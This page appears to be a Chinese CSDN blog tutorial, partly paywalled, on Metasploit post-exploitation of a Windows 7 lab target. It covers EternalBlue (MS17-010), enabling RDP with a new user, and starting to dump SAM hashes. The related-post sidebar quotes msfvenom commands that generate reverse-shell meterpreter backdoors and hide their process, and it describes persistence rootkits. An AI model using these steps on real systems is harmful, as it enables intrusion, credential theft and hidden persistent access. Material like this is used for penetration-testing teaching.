Metasploit 渗透测试之制作隐藏后门

已于 2022-05-06 21:30:58 修改
阅读量2.8k 收藏 15
点赞数 2
文章标签: 安全 web安全 系统安全 linux windows
于 2022-05-01 21:00:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46035615/article/details/124531038
版权

内容

  1. 实战-使用 ms17-010 永恒之蓝漏洞对 win7 进行渗透
  2. 实战-Linux 无文件木马程序
  3. 实战-使用脚本来进行自动创建后门
  4. 系统日志清理

1.实战-使用 ms17-010 永恒之蓝漏洞对 win7 进行渗透

本次主要新增加了一些后渗透的步骤,先来回顾一下,永恒之蓝的利用过程
首先准备一台win7靶机最好与我们的kali在同一局域网中
打开msf
在这里插入图片描述

搜索相关可以利用的模块,选择对应的进行利用

在这里插入图片描述

查看一下需要配置的参数
在这里插入图片描述

这里只需要配置目标的ip地址

在这里插入图片描述启动
在这里插入图片描述

成功拿到shell,我们来一个屏幕共享

在这里插入图片描述
在这里插入图片描述
下面进行后渗透,首先在win7主机上创建一个新用户来远程连接win7桌面
PDR概述:远程桌面协议,是一个多通道的协议,让用户连上提供微软终端机服务的电脑
将当前的会话存在后台运行
在这里插入图片描述

post/windows/manage/enable_rdp 这个模块可以帮我们启动目标主机的rdp服务,并且可以帮助我们自动创建rdp用户,另外还可以帮我们把目标主机的rdp端口映射到本地

在这里插入图片描述
创建rdp用户
在这里插入图片描述

下面我们指定sessionID,这里指定的sessionID一定是我们拿到shell的session

在这里插入图片描述

创建用户成功,我们在新开一个终端,来利用远程桌面进行连接

在这里插入图片描述
在这里插入图片描述

这时我们点击是,目标主机的使用用户就会被锁定

在这里插入图片描述
目标主机的界面,如果超过三十秒为做出选择,则会自动断开连接
在这里插入图片描述

成功连接到win7桌面
在这里插入图片描述

下面我们关闭主机防护策略并开启后门
通过ms17-010永恒之蓝获取到的shell可能会出现操作受限的情况,所以我们使用主机的账户信息建立session 进行连接
这个时候可以认为我们把我们创建的用户当作跳板,进而去渗透其他的用户
SAM概述:SAM文件即账号密码数据库文件,SAM文件的位置是C:\Windows\System32\config\SAM
我们来到指定的文件目录进行查看
在这里插入图片描述

回到msf控制台,从SAM中导出密码哈希

最低0.47元/天 解锁文章
White boy&
关注
  • 2
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Vegile:此工具将在您已经设置后门程序时设置您的后门rootkit,它将隐藏您的spesisifc进程,并以metasploit和透明的方式无限期地进行会话。 即使被杀死,它也会再次运行。 总是有一个过程在运行另一个进程时,所以我们可以假设这个过程像《 The Shell》中的《 Ghost》一样是不可阻挡的
02-04
Vegile:此工具将在您已经设置后门程序时设置您的后门rootkit,它将隐藏您的spesisifc进程,并以metasploit和透明的方式无限期地进行会话。 即使被杀死,它也会再次运行。 总是有一个过程在运行另一个进程时,所以我们可以假设这个过程像《 The Shell》中的《 Ghost》一样是不可阻挡的
Metasploit 生成各种后门
CSDN
01-13 8491
Metasploit 是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,同时该工具也是渗透测试环境中的利器,它支持多平台Payload的生成具有完全的跨平台性,本次实验将学会生成各种攻击载荷。linux系统下只需要执行下面的三条命令既可以自动安装,不过国内网速你懂的.
metasploit---创建后门
孤的博客
11-22 780
后门技术来维持对被攻击系统的访问。后门可帮助攻击者维持系统访问,并使攻击者无须重复地实施攻击就能随意使用被攻击系统。后门就是就是绕过正常的计算机机制,获取计算机访问权限的方法。 常见EXE后门 metasploit提供了三个辅助工具来创建payload后门,分别是msfpayload、msfencode以及msfvenom,不过现在只有msfvenom(里面集成了msfpayload和msfenc...
Metasploit之多种后门生成
weixin_30790841的博客
08-30 420
本章节的后门有以下几种 windows -->使用模块“windows/meterpreter/reverse_tcp” 命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=44444 X >test.exe 参考“09-Metasploit之我的远程控制软件” li...
metasploit永久后门
热门推荐
星落的博客
05-26 1万+
metasploit永久后门简介 利用漏洞获取的meterpreter shell 运行于内存中,重启失效。 重复利用exploit 漏洞可能造成程序崩溃 持续永久后门保证漏洞修复后仍可以远程控制 metsvc永久后门 1.生成metsvc后门 run metsvc -A 2.启用侦听模块,设置指定metsvc_bind_tcp payload(metsvc默认侦听端口31337) use exploit/multi/handler set payload windows/m...
第10章-Metasploit渗透测试制作隐藏后门-v7.pdf
08-08
第10章-Metasploit渗透测试制作隐藏后门-v7 本课程设计目的只用于教学,切勿使用课程中的技术进行违法活 动,学员利用课程中的造成的技术后果与讲师本人无关,倡导维护网络安 全人人有责,共同维护网络文明和谐。
Metasploit渗透测试魔鬼训练营 读书笔记
09-18
渗透测试-web渗透6.pdf 渗透测试-内网客户端渗透9.pdf 渗透测试-内网网络服务端渗透7.pdf 渗透测试-后渗透阶段10.pdf 渗透测试-实验拓扑环境4.pdf 渗透测试-情报搜集5.pdf 渗透测试-社会工程学8.pdf 渗透测试...
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
介绍Metasploit使用方法,进行各种各样的渗透测试
Metasploit渗透测试指南 修订版
09-21
Metasploit渗透测试指南 修订版,是Metasploit框架渗透测试入门畅销近十年的口碑好书!!PDF扫描版,有详细书签!
Vegile-master.zip
03-12
隐藏后门程序
使用metasploit制做基础的后门程序
梦想闹钟
05-23 239
这里使用metasploit自带的payload生成后门exe文件,LHOST指定连接的地址,LPORT字面意思指定连接的端口,靶机在点击后,就会自己去连接攻击机的端口 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.102.131 LPORT=6060 -f exe > myvirus.exe 之后上传到windows xp的靶机里并点击运行,需要先确保靶机和攻击机能ping通 之后在攻击机再次加载对应的payload并进行监
后门攻击——Metasploit的使用
m0_57069925的博客
06-15 1858
此文章可以学习通过kali中的Metasploit生成后门程序,控制Windows系统的技巧,切勿用于真实环境,仅用于学习,若产生一切后果,由产生者负责一.简介后门攻击是一种新兴的针对深度学习模型的攻击方式,攻击者在模型的训练过程中通过某种方式对模型植入一些后门。当后门未被激发时,被攻击的模型具有和正常模型类似的表现;而当模型中埋藏的后门被攻击者激活时,模型的输出变为攻击者预先指定的标签以达到恶意的目的。简单的说明msfvenom是生成木马的,而msfconsole是监听的二.攻击演示攻击者:kali 20
kali metasploit 制作后门程序远程操控基本使用方法
qq_51685718的博客
12-03 3974
kali metasploit制作后门程序远程操控基本使用方法 1.后门程序的制作与加密 后门的实质就是木马 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.34.53 lport=10000 -f exe -o biyu.exe lhost后面加的是本机ip,lport后面加的是想要打开的端口号 执行后会在本地生成一个biyu.exe的文件 如果直接上传到win系统会被杀毒软件杀掉,我们可以用自己的电脑对其进行一个加壳操作。 下
Metasploit后门渗透Linux系统以及跨平台后门生成
08-28 300
Metasploit后门渗透Linux系统以及跨平台后门生成 Metasploit后门渗透Linux系统以及跨平台后门生成1.Metasploit对目标主机SSH爆破1.1爆破过程2.PHP后门生成3.JAVA后门生成4.LINUX后门生成参考文档 TOC 1.Metasploit对目标主机SSH爆破 1.实验原理:靶机root用户存在弱口令漏洞,利用枚举的方法破解目标主机ssh...
复现黑客在后门中藏匿后门
tpaer的博客
11-29 2042
有很多hacker不讲武德,在写好的大马中藏入自己的后门,在我们使用这个hacker写的后门进行远控时,也同时会上线或发送信息到他的服务器。
msf渗透linux教程,Metasploit后门渗透Linux系统以及跨平台后门生成
weixin_31312621的博客
05-03 1585
本帖最后由 小爱_Joker 于 2017-3-9 12:30 编辑标题:Metasploit后门渗透Linux系统以及跨平台后门生成作者:小爱_Joker难度:两级阅读点:使用Metasploit生成多种后门从而快速渗透linux系统上次发的那个Metasploit使用php后门渗透linux主机 不造为啥不能shell 使用终端 有点尴尬。攻击者IP:192.168.0.5受害者IP:192....
Metasploit(后渗透攻击:操作系统后门
qq_41453632的博客
12-10 3637
   在完成了权限提升之后,我们就应该建立后门(backdoor)了,以维持对目标主机的控制权,这样一来,即使我们所利用的漏洞被补丁程序修复,还可以通过后门继续控制目标系统。 1.Cymothoa后门    Cymothoa是一款可以将ShellCode注入现有进程(即插进程)的后门工具。借助这种注入手段,,他能够把shellcode伪装成常规程序。他所注入的后门程序应当能够与被注入的程序(进...
Metasploit渗透——msfvenom隐藏恶意进程
negnegil的博客
09-15 723
我们上传了msf马后并不是万无一失的,msf马创建的进程极有可能被防御设备发现,发出警报并采取措施终止进程,我们的会话也会被终止。因此,我们有必要将创建的msf马进程迁移到目标及正在运行的进程中,这样受害者就无法找到恶意进程,从而定位到恶意软件的位置了。 第一种方法 通过使用 PrependMigrate参数使生成的可执行文件隐藏在名为explorer.exe的进程后面。 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.109 lpor
metasploit渗透测试
最新发布
08-02
Metasploit是一个渗透测试工具,也是信息安全与渗透测试领域最大的开源项目之一。它可以帮助您查找、利用和验证漏洞,并附带了数百个已知软件漏洞的专业级漏洞攻击工具。Metasploit的设计初衷是打造成一个攻击工具开发平台。在使用Metasploit进行渗透测试时,一般可以按照以下步骤进行操作: 1. 确定漏洞:首先需要确定目标系统存在的漏洞,可以通过查找已知漏洞来进行。例如,可以使用命令"search 漏洞名称"来搜索相关模块[2]。 2. 查找模块:一旦确定了目标漏洞,可以使用Metasploit的模块来进行攻击。可以使用命令"search 漏洞名称"来查找相关模块[2]。 3. 配置模块程序:在使用模块之前,需要配置相关参数,例如设置攻击载荷、设置参数等。可以使用命令"use 模块名称"来选择要使用的模块,然后使用"set 参数名称 值"来配置参数[2]。 4. 执行模块程序:配置完成后,可以使用命令"exploit"或"run"来执行模块程序,进行漏洞利用[2]。 总的来说,Metasploit是一个功能强大的渗透测试工具,可以帮助安全专业人员评估系统的安全性,并提供了丰富的漏洞攻击工具和模块,以支持渗透测试工作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

White boy&

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值